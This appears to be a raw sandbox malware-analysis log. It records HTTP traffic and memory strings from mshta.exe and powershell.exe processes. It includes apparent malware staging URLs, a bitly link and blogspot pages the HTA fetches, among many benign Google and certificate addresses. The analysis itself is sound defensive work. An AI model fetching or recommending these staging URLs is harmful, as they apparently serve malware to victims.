Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Connects to a URL shortener service
Source: C:\Windows\SysWOW64\mshta.exe DNS query: name: bitly.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundX-Robots-Tag: noindex, nofollowContent-Type: text/html; charset=UTF-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 15 Sep 2021 13:50:58 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.537840121.0000020DA13B5000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22
Source: mshta.exe, 00000026.00000002.537540632.0000025B28400000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22Lo
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22l
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22n8
Source: mshta.exe, 0000001B.00000002.536149050.0000020DA1380000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22w8
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.488833964.00000000036BB000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.517008980.000001ACCCB1F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558814631.000001BEE8A42000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000009.00000003.363343843.00000000083F1000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsof8
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: mshta.exe, 00000006.00000003.308074680.000000000E06B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.271983439.00000000067D5000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000021.00000002.536031490.00000214EFFB6000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22
Source: mshta.exe, 00000021.00000002.534478877.00000214EFF94000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%226
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Q
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Y
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22y.IE5
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: powershell.exe, 00000016.00000002.423706608.000001ACB4C30000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.491682345.0000000005521000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png8
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/BlogPosting
Source: powershell.exe, 00000009.00000002.491172132.00000000053E1000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.418649921.000001ACB4A21000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.583919483.000001BEEB0BA000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.584891429.0000021CF4A17000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.622770699.0000021CF7452000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.593616053.000002632F192000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.423706608.000001ACB4C30000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.491682345.0000000005521000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
Source: mshta.exe, 00000006.00000003.307694969.000000000686C000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Ju
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.314690135.000000000A33F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309308738.000000000A35F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.541490035.000001B6E5EFA000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp String found in binary or memory: http://www.blogger.com/go/cookiechoices
Source: mshta.exe, 00000006.00000002.432469897.000000000A38A000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: http://www.cookiechoices.org/
Source: mshta.exe, 00000021.00000002.618824886.0000021CF72F0000.00000004.00000040.sdmp String found in binary or memory: http://www.macromedia.com
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/#
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/A
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.551594539.00000215A320F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.352421705.000001BEEAD2C000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.550016684.000001BEE7D1B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559451367.000001BEE8ADF000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.549327111.00000214F1AEF000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.551825360.000002632A3EC000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogge
Source: mshta.exe, 0000001D.00000003.389378675.000001BEEAD09000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/U
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.313544011.0000000008DE7000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623318608.00000215A961D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.582770017.000001BEEB058000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.610943907.0000021CF709E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: mshta.exe, 00000006.00000003.332704739.000000000DFD9000.00000004.00000001.sdmp String found in binary or memory: https://apis.googl
Source: mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://artsandculture.google.com/?hl=en-GB&utm_source=ogs.google.com&utm_medium=referral
Source: mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://artsandculture.google.com/?hl=en-GB&utm_source=ogs.google.com&utm_medium=referraleferral
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://artsandculture.google.com/?hl=en-GB&utm_source=ogs.google.com&utm_medium=referralis
Source: powershell.exe, 00000016.00000002.427496581.000001ACB4DC6000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.505010455.000001ACC4FE9000.00000004.00000001.sdmp String found in binary or memory: https://aui-cdn.atlassian.com
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com//p/ayoolaback.html%22
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com//p/ayoolaback.html%2244))
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com//p/ayoolaback.html%22x
Source: mshta.exe, 00000026.00000002.582535997.000002632CF37000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/O
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/favicon.ico
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default?alt=rssR
Source: mshta.exe, 0000001B.00000002.540726226.0000020DA1429000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultO
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultX
Source: mshta.exe, 0000001B.00000002.602565559.00000215A8C00000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultZ
Source: mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultbv_
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.js
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.js0
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.js8
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.jsG
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.jsogID=7680886694920034828&zx=ad70dca0-0e6f-4
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/lass
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623318608.00000215A961D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22(
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22...DW
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22.js2OL4
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%229m
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22?interstitial=ABqL8_h2JWMGlPiHM8-D8RSUQjB
Source: mshta.exe, 00000026.00000003.478480069.000002632CBCC000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22abbr
Source: mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22bw_
Source: mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.574240914.000002632CA03000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22https://www.blogger.com/static/v1/jsbin/4
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22laback.html%22e:
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22labackf8
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22o?
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22rif
Source: mshta.exe, 0000001B.00000002.536818867.0000020DA1394000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22ry.IE5html%22
Source: mshta.exe, 0000001B.00000002.540726226.0000020DA1429000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22w
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.603530510.000002632F78C000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22x
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog6q
Source: mshta.exe, 0000001B.00000002.561855853.00000215A3EB2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blogP
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blogc
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blogy
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/pw
Source: mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/search
Source: mshta.exe String found in binary or memory: https://bitbucket.or
Source: powershell.exe, 00000016.00000002.423706608.000001ACB4C30000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000016.00000002.490688802.000001ACB6848000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.421612039.0000000004F70000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjagh
Source: mshta.exe, 00000006.00000002.432405705.000000000A382000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjagh.
Source: mshta.exe, 00000006.00000002.419417741.0000000002ED0000.00000004.00000020.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghC:
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghMar
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghQ
Source: mshta.exe, 00000006.00000002.419644409.0000000003360000.00000004.00000040.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghVERr
Source: mshta.exe, 00000006.00000002.426851753.000000000678F000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghm
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://books.google.co.uk/?hl=en-GB&tab=jp
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://books.google.co.uk/?hl=en-GB&tab=jp5~x
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://calendar.google.com/calendar?tab=jc
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://calendar.google.com/calendar?tab=jca~
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://chat.google.com/
Source: mshta.exe, 00000006.00000003.284758278.00000000067F4000.00000004.00000001.sdmp String found in binary or memory: https://chat.google.com/lgOQ
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://contacts.google.com/?hl=en-GB&taI
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://contacts.google.com/?hl=en-GB&tab=jC
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://contacts.google.com/?hl=en-GB&tab=jCger.com;
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000006.00000003.308074680.000000000E06B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.271983439.00000000067D5000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574438188.0000021CF46CA000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/apps-themes
Source: mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.529759929.0000004D382FB000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.529475810.0000009CCDBFB000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/blogger-tech
Source: mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report
Source: mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542053098.0000020DA145B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574438188.0000021CF46CA000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/apps-themes
